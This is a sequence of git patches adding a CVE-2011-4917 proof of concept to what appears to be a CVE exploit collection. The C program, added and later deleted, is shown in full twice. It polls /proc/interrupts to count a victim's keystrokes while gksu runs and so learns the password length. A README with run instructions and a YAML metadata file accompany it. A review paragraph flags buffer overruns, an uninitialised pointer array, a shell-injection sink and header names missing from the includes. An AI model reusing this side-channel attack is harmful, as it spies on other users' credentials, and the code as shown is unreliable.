From: KunWang Date: Mon, 10 Apr 2023 08:38:20 +0000 Subject: [PATCH 15/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 1ef9ab9c3abadc50a7874847b09400e70b865a23 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:40:16 +0000 Subject: [PATCH 16/26] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4917?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 18db97dcfc39b356cb4739f57b25caf7e995a9de Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:43:12 +0000 Subject: [PATCH 17/26] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4917?= =?UTF-8?q?/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c.=20=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E5=88=A9=E7=94=A8=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- .../CVE-2011-4917/CVE-2011-4917.c | 178 ++++++++++++++++++ 1 file changed, 178 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c 
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c new file mode 100644 index 00000000..949781c2 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c 
@@ -0,0 +1,178 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+int i8042_number;
+int ints[1024], ints_prev[1024], ints_delta[1024];
+
+char buffer[1024];
+
+int reread_ints(int *interrupts, int int_count, char **names)
+{
+ int i;
+ int n, c1, c2;
+ char s1[1024], s2[1024];
+
+ int interrupts_fd;
+ FILE *interrupts_file;
+
+ interrupts_fd = open("/proc/interrupts", O_RDONLY);
+ if (interrupts_fd == -1)
+ err(1, "open(\"/proc/interrupts\")");
+
+ interrupts_file = fdopen(interrupts_fd, "r");
+ if (interrupts_file == NULL)
+ err(1, "fdopen");
+
+ if (fseek(interrupts_file, 0, SEEK_SET) < 0)
+ err(1, "lseek");
+
+ fgets(buffer, sizeof(buffer), interrupts_file);
+
+ for (i = 0; i < int_count; i++) {
+ if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) {
+ fclose(interrupts_file);
+ return i;
+ }
+
+ if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) {
+ fclose(interrupts_file);
+ return i;
+ }
+
+ if (names != NULL && names[i] == NULL)
+ names[i] = strdup(s2);
+
+ interrupts[i] = c1 + c2;
+ }
+
+ fclose(interrupts_file);
+ return int_count;
+}
+
+void init_i8042_number(void)
+{
+ int i;
+ int can_be_keyboard[1024];
+ char *names[1024];
+ int number_of_interrups, can_be_keyboard_numbers;
+
+ number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names);
+
+ /*
+ * Identify the i8042 interrupt associated with the keyboard by:
+ * 1) name should be i8042
+ * 2) interrupts count emitted in one second shouldn't be more than 100
+ */
+ for (i = 0; i < number_of_interrups; i++)
+ can_be_keyboard[i] = strcmp(names[i], "i8042") == 0;
+
+ while (1) {
+ sleep(1);
+ reread_ints(ints, sizeof(ints), NULL);
+
+ can_be_keyboard_numbers = 0;
+ for (i = 0; i < number_of_interrups; i++) {
+ can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100;
+ if (can_be_keyboard[i])
+ can_be_keyboard_numbers++;
+
+ ints_prev[i] = ints[i];
+ }
+
+ if (can_be_keyboard_numbers == 1) {
+ for (i = 0; i < number_of_interrups; i++)
+ if (can_be_keyboard[i]) {
+ i8042_number = i;
+ printf("i8042 keyboard is #%d\n", i);
+ return;
+ }
+ }
+ }
+}
+
+int i8042_read(void)
+{
+ reread_ints(ints, sizeof(ints), NULL);
+ ints_prev[i8042_number] = ints[i8042_number];
+
+ return ints[i8042_number];
+}
+
+int wait_for_program(char *pname)
+{
+ FILE *f;
+ int pid;
+ char s[1024];
+
+ snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;"
+ " sleep 0.1; done", pname);
+ system(s);
+ snprintf(s, sizeof(s), "pgrep %s", pname);
+ f = popen(s, "r");
+ if (f == NULL)
+ err(1, "popen");
+
+ if (fgets(buffer, sizeof(buffer), f) == NULL)
+ err(1, "fgets");
+
+ if (sscanf(buffer, "%d", &pid) < 1)
+ err(1, "sscanf");
+
+ pclose(f);
+
+ return pid;
+}
+
+int main(int argc, char *argv[])
+{
+ int n, old, sum, i;
+ int pid;
+ char *pname = argv[1];
+
+ if (argc < 2)
+ errx(1, "usage: spy-interrupts gksu");
+
+ puts("Waiting for mouse activity...");
+ init_i8042_number();
+
+ pid = wait_for_program(pname);
+ printf("%s is %d\n", pname, pid);
+
+ old = i8042_read();
+
+ sum = 0;
+
+ while (1) {
+ n = i8042_read();
+ if (old == n)
+ usleep(10000);
+ else {
+ for (i = 0; i < n-old; i++)
+ putchar('.');
+ fflush(stdout);
+ }
+
+ sum += n - old;
+ old = n;
+
+ if (kill(pid, 0) < 0 && errno == ESRCH)
+ break;
+ }
+
+ /*
+ * #interrupts == 2 * #keystrokes.
+ * #keystrokes = len(password) - 1 because of ENTER after the password.
+ */
+ printf("\n%d keystrokes\n", (sum-2)/2);
+
+ return 0;
+}
\ No newline at end of file
-- Gitee From 15b8506bc5b13cc97976e1c4acc0090fde0ae836 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:50:24 +0000 Subject: [PATCH 18/26] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4917?= =?UTF-8?q?/CVE-2011-4917/README.md.=20CVE-2011-4917=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E6=8F=8F=E8=BF=B0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
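Review bot: `reread_ints(ints_prev, sizeof(ints_prev), names)` in init_i8042_number, like the two `sizeof(ints)` calls in init_i8042_number and i8042_read, passes a byte count (4096) as `int_count` for arrays of 1024 elements, so a /proc/interrupts with more than 1024 lines writes past the end of `interrupts[]` and `names[]`; the bound should be `sizeof(ints_prev) / sizeof(ints_prev[0])`. `char *names[1024]` in init_i8042_number is never initialised, yet reread_ints tests `names[i] == NULL` before calling strdup and the strcmp loop then dereferences whatever the slot holds, which is undefined behaviour; `char *names[1024] = {0};` fixes it. In wait_for_program, argv[1] is pasted unquoted into the command strings handed to system() and popen(), a shell-injection sink even though the value comes from the invoking user; spawning pgrep with an explicit argv (execvp/posix_spawn), or rejecting anything outside `[A-Za-z0-9_.-]` first, removes it. The `#include` lines carry no header names in this rendering (presumably stripped on extraction, so the file as shown does not compile), `err(1, "lseek")` names the wrong call for a failed fseek, and `ints_delta` is declared but never used.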
Signed-off-by: KunWang
---
 .../2011/CVE-2011-4917/CVE-2011-4917/README.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md
new file mode 100644
index 00000000..d95ca27d
--- /dev/null
+++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md
@@ -0,0 +1,14 @@
+A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1.
+In the Linux kernel through 3.1 there is an information disclosure issue via /proc/stat.
+
+The file /proc/interrupts is world readable. It contains information about how many interrupts were emitted since the system boot. We may loop on one CPU core while the victim is executed on another, and learn the length of victim's passord via monitoring emitted interrupts' counters of the keyboard interrupt. The PoC counts only keystrokes number, but it can be easily extended to note the delays between the keystrokes and do the statistical analysis to learn the precise input characters.
+
+The limitations:
+ - it works on 2-core CPUs only.
+ - it works on 1-keyboard systems only.
+ - it doesn't carefully count the first and last keystrokes (e.g. ENTER after the password input).
+ - it doesn't carefully filter keystrokes after ENTER.
+
+run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu
+
+P.S. The harm of 0444 /proc/interrupts is known for a long time, but I was told about this specific attack vector by Tavis Ormandy just after similar PoC spy-sched was published.
\ No newline at end of file
-- Gitee From 25b76a7f295e3958ee348a886d3e1f0f80d4d12c Mon Sep 17 00:00:00 2001
From: KunWang Date: Mon, 10 Apr 2023 08:50:38 +0000 Subject: [PATCH 19/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 77b2c7bac5ae4ea36a8d832e2ffc8ee2485c4734 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:51:34 +0000 Subject: [PATCH 20/26] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4917?= =?UTF-8?q?/CVE-2011-4917/CVE-2011-4917/README.md.=20CVE-2011-4917?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E6=8F=8F=E8=BF=B0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- .../CVE-2011-4917/CVE-2011-4917/README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/README.md diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/README.md b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/README.md new file mode 100644 index 00000000..d95ca27d --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/README.md 
@@ -0,0 +1,14 @@
+A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1.
+In the Linux kernel through 3.1 there is an information disclosure issue via /proc/stat.
+
+The file /proc/interrupts is world readable. It contains information about how many interrupts were emitted since the system boot. We may loop on one CPU core while the victim is executed on another, and learn the length of victim's passord via monitoring emitted interrupts' counters of the keyboard interrupt. The PoC counts only keystrokes number, but it can be easily extended to note the delays between the keystrokes and do the statistical analysis to learn the precise input characters.
+
+The limitations:
+ - it works on 2-core CPUs only.
+ - it works on 1-keyboard systems only.
+ - it doesn't carefully count the first and last keystrokes (e.g. ENTER after the password input).
+ - it doesn't carefully filter keystrokes after ENTER.
+
+run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu
+
+P.S. The harm of 0444 /proc/interrupts is known for a long time, but I was told about this specific attack vector by Tavis Ormandy just after similar PoC spy-sched was published.
\ No newline at end of file
-- Gitee From 195af5317d4fffbda0fde2574ec4afb72d5fb8f5 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:51:43 +0000 Subject: [PATCH 21/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.?= =?UTF-8?q?keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
---
 .../2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee From 20ebd8a122880144e86293c9272a25c0bcf8bcab Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 09:02:22 +0000 Subject: [PATCH 22/26] add cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml. Signed-off-by: KunWang
---
 .../CVE-2011-4917/CVE-2011-4917.yaml | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml
new file mode 100644
index 00000000..e3bb0b40
--- /dev/null
+++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml
@@ -0,0 +1,19 @@
+id: CVE-2011-4917
+source:
+https://www.openwall.com/lists/oss-security/2011/11/07/9
+info:
+name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。
+severity: medium
+description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。
+scope-of-influence:
+ Linux kernel <= 3.1
+reference:
+- https://nvd.nist.gov/vuln/detail/cve-2011-4917
+classification:
+cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+cvss-score: 5.5
+cve-id: CVE-2011-4917
+cwe-id: CWE-200
+cnvd-id: None
+kve-id: None
+tags: information disclosure
\ No newline at end of file
-- Gitee From 50fe4a883db29c5e4e6496d97d5acd42109d772b Mon Sep 17 00:00:00 2001
From: KunWang Date: Mon, 10 Apr 2023 09:02:46 +0000 Subject: [PATCH 23/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CVE-2011-4917/CVE-2011-4917.c | 178 ------------------ 1 file changed, 178 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c deleted file mode 100644 index bab4fad3..00000000 --- a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c +++ /dev/null 
@@ -1,178 +0,0 @@
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-
-int i8042_number;
-int ints[1024], ints_prev[1024], ints_delta[1024];
-
-char buffer[1024];
-
-int reread_ints(int *interrupts, int int_count, char **names)
-{
- int i;
- int n, c1, c2;
- char s1[1024], s2[1024];
-
- int interrupts_fd;
- FILE *interrupts_file;
-
- interrupts_fd = open("/proc/interrupts", O_RDONLY);
- if (interrupts_fd == -1)
- err(1, "open(\"/proc/interrupts\")");
-
- interrupts_file = fdopen(interrupts_fd, "r");
- if (interrupts_file == NULL)
- err(1, "fdopen");
-
- if (fseek(interrupts_file, 0, SEEK_SET) < 0)
- err(1, "lseek");
-
- fgets(buffer, sizeof(buffer), interrupts_file);
-
- for (i = 0; i < int_count; i++) {
- if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) {
- fclose(interrupts_file);
- return i;
- }
-
- if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) {
- fclose(interrupts_file);
- return i;
- }
-
- if (names != NULL && names[i] == NULL)
- names[i] = strdup(s2);
-
- interrupts[i] = c1 + c2;
- }
-
- fclose(interrupts_file);
- return int_count;
-}
-
-void init_i8042_number(void)
-{
- int i;
- int can_be_keyboard[1024];
- char *names[1024];
- int number_of_interrups, can_be_keyboard_numbers;
-
- number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names);
-
- /*
- * Identify the i8042 interrupt associated with the keyboard by:
- * 1) name should be i8042
- * 2) interrupts count emitted in one second shouldn't be more than 100
- */
- for (i = 0; i < number_of_interrups; i++)
- can_be_keyboard[i] = strcmp(names[i], "i8042") == 0;
-
- while (1) {
- sleep(1);
- reread_ints(ints, sizeof(ints), NULL);
-
- can_be_keyboard_numbers = 0;
- for (i = 0; i < number_of_interrups; i++) {
- can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100;
- if (can_be_keyboard[i])
- can_be_keyboard_numbers++;
-
- ints_prev[i] = ints[i];
- }
-
- if (can_be_keyboard_numbers == 1) {
- for (i = 0; i < number_of_interrups; i++)
- if (can_be_keyboard[i]) {
- i8042_number = i;
- printf("i8042 keyboard is #%d\n", i);
- return;
- }
- }
- }
-}
-
-int i8042_read(void)
-{
- reread_ints(ints, sizeof(ints), NULL);
- ints_prev[i8042_number] = ints[i8042_number];
-
- return ints[i8042_number];
-}
-
-int wait_for_program(char *pname)
-{
- FILE *f;
- int pid;
- char s[1024];
-
- snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;"
- " sleep 0.1; done", pname);
- system(s);
- snprintf(s, sizeof(s), "pgrep %s", pname);
- f = popen(s, "r");
- if (f == NULL)
- err(1, "popen");
-
- if (fgets(buffer, sizeof(buffer), f) == NULL)
- err(1, "fgets");
-
- if (sscanf(buffer, "%d", &pid) < 1)
- err(1, "sscanf");
-
- pclose(f);
-
- return pid;
-}
-
-int main(int argc, char *argv[])
-{
- int n, old, sum, i;
- int pid;
- char *pname = argv[1];
-
- if (argc < 2)
- errx(1, "usage: spy-interrupts gksu");
-
- puts("Waiting for mouse activity...");
- init_i8042_number();
-
- pid = wait_for_program(pname);
- printf("%s is %d\n", pname, pid);
-
- old = i8042_read();
-
- sum = 0;
-
- while (1) {
- n = i8042_read();
- if (old == n)
- usleep(10000);
- else {
- for (i = 0; i < n-old; i++)
- putchar('.');
- fflush(stdout);
- }
-
- sum += n - old;
- old = n;
-
- if (kill(pid, 0) < 0 && errno == ESRCH)
- break;
- }
-
- /*
- * #interrupts == 2 * #keystrokes.
- * #keystrokes = len(password) - 1 because of ENTER after the password.
- */
- printf("\n%d keystrokes\n", (sum-2)/2);
-
- return 0;
-}
\ No newline at end of file
-- Gitee From 155f5d1f0dde8b89a6dcfad64584ded8a3839f96 Mon Sep 17 00:00:00 2001
From: KunWang Date: Mon, 10 Apr 2023 09:03:03 +0000 Subject: [PATCH 24/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
---
 .../2011/CVE-2011-4917/CVE-2011-4917/README.md | 14 --------------
 1 file changed, 14 deletions(-)
 delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md
deleted file mode 100644
index d95ca27d..00000000
--- a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/README.md
+++ /dev/null
@@ -1,14 +0,0 @@
-A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1.
-In the Linux kernel through 3.1 there is an information disclosure issue via /proc/stat.
-
-The file /proc/interrupts is world readable. It contains information about how many interrupts were emitted since the system boot. We may loop on one CPU core while the victim is executed on another, and learn the length of victim's passord via monitoring emitted interrupts' counters of the keyboard interrupt. The PoC counts only keystrokes number, but it can be easily extended to note the delays between the keystrokes and do the statistical analysis to learn the precise input characters.
-
-The limitations:
- - it works on 2-core CPUs only.
- - it works on 1-keyboard systems only.
- - it doesn't carefully count the first and last keystrokes (e.g. ENTER after the password input).
- - it doesn't carefully filter keystrokes after ENTER.
-
-run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu
-
-P.S. The harm of 0444 /proc/interrupts is known for a long time, but I was told about this specific attack vector by Tavis Ormandy just after similar PoC spy-sched was published.
\ No newline at end of file
-- Gitee
From b3be1727ea38b4af380496d96a10a5e4df7f04a2 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 09:15:49 +0000 Subject: [PATCH 25/26] update cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml. Signed-off-by: KunWang --- .../CVE-2011-4917/CVE-2011-4917.yaml | 33 +++++++++---------- 1 file changed, 16 insertions(+), 17 deletions(-) diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml index e3bb0b40..5dc48de9 100644 --- a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.yaml @@ -1,19 +1,18 @@ id: CVE-2011-4917 -source: -https://www.openwall.com/lists/oss-security/2011/11/07/9 +source: https://www.openwall.com/lists/oss-security/2011/11/07/9 info: -name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 -severity: medium -description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 -scope-of-influence: - Linux kernel <= 3.1 -reference: -- https://nvd.nist.gov/vuln/detail/cve-2011-4917 -classification: -cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N -cvss-score: 5.5 -cve-id: CVE-2011-4917 -cwe-id: CWE-200 -cnvd-id: None -kve-id: None -tags: information disclosure \ No newline at end of file + name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 + severity: medium + description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2011-4917 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4917 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file -- Gitee 
From eb53a3a67a3ce2341ddfbadd9da009f5648c1514 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 09:19:16 +0000 Subject: [PATCH 26/26] update other_list.yaml. Signed-off-by: KunWang --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index c02895cc..57d43e26 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -14,6 +14,7 @@ cve: - CVE-2020-27194 - CVE-2023-0179 - CVE-2018-18955 + - CVE-2011-4917 polkit: - CVE-2021-3560 Outlook: -- Gitee